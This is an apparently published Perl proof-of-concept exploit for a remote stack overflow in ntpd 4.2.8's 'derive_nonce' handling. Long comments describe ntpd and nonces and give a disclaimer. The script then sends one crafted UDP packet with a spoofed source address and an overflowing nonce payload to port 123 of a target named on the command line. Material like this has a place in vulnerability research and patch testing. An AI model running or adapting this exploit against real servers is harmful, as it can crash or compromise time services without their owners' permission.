Linux ntpd 4.2.8 derive_nonce remote stack overflow proof of concept exploit.
82c7c116090828fd0e56ef327c62c461#!/usr/bin/perl
#
# Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC
#
# Copyright 2016 (c) Todor Donev
# [email protected]
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
# http://pastebin.com/u/hackerscommunity
#
#
# Description:
# The ntpd program is an operating-system daemon that sets and maintains
# a computer system's system time in synchronization with Internet-standard
# time servers. It is a complete implementation of the Network Time Protocol
# (NTP) version 4, but retains compatibility with versions 1, 2, and 3.
# ntpd uses a single configuration-file to run the daemon in server and/or
# client modes. The configuration file, usually named ntp.conf, is located
# in the /etc directory. Other important files include the drift file, which
# ntpd uses to correct for hardware-clock skew in the absence of a connection
# to a more accurate upstream time-server.
#
# Nonce is an arbitrary number that may only be used once. It is similar in
# spirit to a nonce word, hence the name. It is often a random or pseudo-random
# number issued in an authentication protocol to ensure that old communications
# cannot be reused in replay attacks. They can also be useful as initialization
# vectors and in cryptographic hash function. A nonce is an arbitrary number used
# only once in a cryptographic communication, in the spirit of a nonce word.
# They are often random or pseudo-random numbers. Many nonces also include a
# timestamp to ensure exact timeliness, though this requires clock synchronization
# between organizations. The addition of a client nonce ("cnonce") helps to improve
# the security in some ways as implemented in digest access authentication. To ensure
# that a nonce is used only once, it should be time-variant (including a suitably
# fine-grained timestamp in its value), or generated with enough random bits to ensure
# a probabilistically insignificant chance of repeating a previously generated value.
# Some authors define pseudo-randomness (or unpredictability) as a requirement for a
# nonce.
#
# Disclaimer:
# This or previous program is for Educational purpose ONLY. Do not
# use it without permission. The usual disclaimer applies, especially
# the fact that Todor Donev is not liable for any damages caused by
# direct or indirect use of the information or functionality provided
# by these programs. The author or any Internet provider bears NO
# responsibility for content or misuse of these programs or any
# derivatives thereof. By using these programs you accept the fact
# that any damage (dataloss, system crash, system compromise, etc.)
# caused by the use of these programs is not Todor Donev's
# responsibility.
#
# Use at your own risk and educational purpose ONLY!
#
# Thanks to Maya Hristova and all my friends that support me.
#
# Suggestions,comments and job offers are welcome!
#
#
use Net::RawIP;
print "[ Linux ntpd 4.2.8 'derive_nonce' remote stack overflow PoC\n";
print "[ ======\n";
print "[ Usg: $0 <target>\n";
print "[ Example: perl $0 133.71.33.7\n";
print "[ ======\n";
print "[ <todor.donev\@gmail.com> Todor Donev\n";
print "[ Facebook: https://www.facebook.com/ethicalhackerorg\n";
print "[ Website: https://www.ethical-hacker.org/\n";
my $target = $ARGV[0];
my $data = "\x26\x0a\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x6e\x6f\x6e\x63\x65\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
my $sock = new Net::RawIP({ udp => {} }) or die;
$sock->set({ ip => { saddr => "192.168.1.1", daddr => $target},
udp => { source, => 31337, dest => 123 , data => $data}});
$sock->send;